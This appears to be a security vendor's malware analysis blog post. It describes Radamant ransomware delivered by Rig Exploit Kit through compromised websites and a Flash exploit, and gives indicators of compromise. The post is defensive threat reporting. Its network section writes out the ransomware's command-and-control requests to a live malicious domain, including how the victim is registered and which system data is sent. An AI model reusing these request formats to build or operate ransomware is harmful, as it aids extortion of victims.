A new ransomware called Radamant has been discovered in early December 2015. On December 31, we found compromised websites redirecting to Rig Exploit Kit and downloading this ransomware. The following sites have been infected:
- www.yatra.com
- www.herbeauty.co
![Infection Chain on yatra.com]()
- Infection Chain on yatra.com
![Infection Chain on herbeauty.co]()
- Infection Chain on herbeauty.co
On the affected page, a malicious html code was injected at the end of the page. The code displays a malicious flash file that redirects to Rig EK landing page.
![Injected Code]()
- Injected Code
As of this writing the said websites are now free from infection.
Flash Exploit
The Rig EK on both sites uses the same flash exploit and also delivers the same payload. The flash exploit targets the following vulnerability:
- CVE-2015-5560
This is an old exploit which affects versions 18.0.0.209 and below. The exploit was patched on August 15, 2015 via Adobe flash player update 18.0.0.232. After exploitation, it will download its payload.
Radamant Ransomware
This is a new breed of ransomware that encrypts files using AES-256 encryption. Bleepingcomputer.com provides an excellent coverage of this ransomware. This malware was also found to be leased as a kit on private malicious sites. It costs $1,000 to rent it for one month or potential buyers can test it for 48 hours for $100 USD.
![Source:http://www.bleepingcomputer.com/news/security/radamant-ransomware-kit-for-sale-on-exploit-and-malware-sites/]()
- Source: http://www.bleepingcomputer.com/news/security/radamant-ransomware-kit-for-sale-on-exploit-and-malware-sites/
As early as December 14, people have been complaining on bleepingcomputer forum that their files encrypted and renamed with .RDM or .RRK extension. This malware scans all files that match certain extensions and encrypts them using a unique AES-256 key for each file. The generated AES-256 key is then encrypted with a Master key which is then embedded into the target file.
Network Connections:
The malware will first issue a POST request to its CnC server http://cutenaskare.com/domains.php to get possible domain/s
POST http://cutenaskare.com/domains.php
Server Reply: [7:cutenaskare.com]
Then it will POST to http://cutenaskare.com/API.php together with its ID and IP address to check if it is already registered in the server
POST http://cutenaskare.com/API.php id={machine fingerprint}&ip={victims IP address}
Server Reply: [0:unknownID][6:{IP region e.g., RU}]
If the victim is new it will reply with [0:unknownID] which instructs the bot to register and post additional system information.
POST http://cutenaskare.com/API.php id={machine fingerprint}&apt=0&os={OS version}&ip={victims IP address}&bits={32 or 64 bit}&discs={Drive Letters}&pub={public key}&prv={private key}
Server Reply:[r:good]
The server will send its public key and the malware will POST to:
POST http://cutenaskare.com/mask.php
The server replies with a list of extensions to encrypt which also triggers the start of encryption. After the malware is finished encrypting files, it will show the following page informing the user that files have been encrypted and instructing the victim to pay .5 Bitcoin (approx 220 USD).
Luckily the malware’s encryption had some flaws which allows Fabian Wosar to recover the encrypted files without paying the ransom.
Fabian’s tool can be downloaded from the following link:
- emsi.at/DecryptRadamant
The tool has been updated to support the latest version known. It is also evident that the malware author/s aren’t pleased with Fabian as they placed some cursed strings on their code in the latest version.
The first version of radamant was first seen on virustotal.com on Dec 3, 2015 and we have identified 3 versions to date.
| Version | MD5 | Mutex Name | Extension of Encrypted Files |
| 1 | e62d58a48f3aca29acd535c3ae4b7ce1 | Radamant_v1_Klitschko_number_one | .RDM |
| 2 | a40f1a7d3c1db966bbabdeb965697c1b | Radamant_v2_Klitschko_number_one | .RDM |
| 2.1 | 72c71e4c78af74f4e500f1422a2f9092 | \Sessions\1radamantv2_emisoft_fucked | .RRK |
Indicators of Compromise
Mutex Names:
Radamant_v1_Klitschko_number_one
Radamant_v2_Klitschko_number_one
\Sessions\1radamantv2_emisoft_fucked
Install Path:
C:\Windows\DirectX.exe
Registry Keys:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Value:svchost or DirectX
Data: C:\Windows\directx.exe
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
Value: svchost or DirectX
Data: C:\Windows\directx.exe
The post Radamant Ransomware distributed via Rig EK appeared first on Cyphort.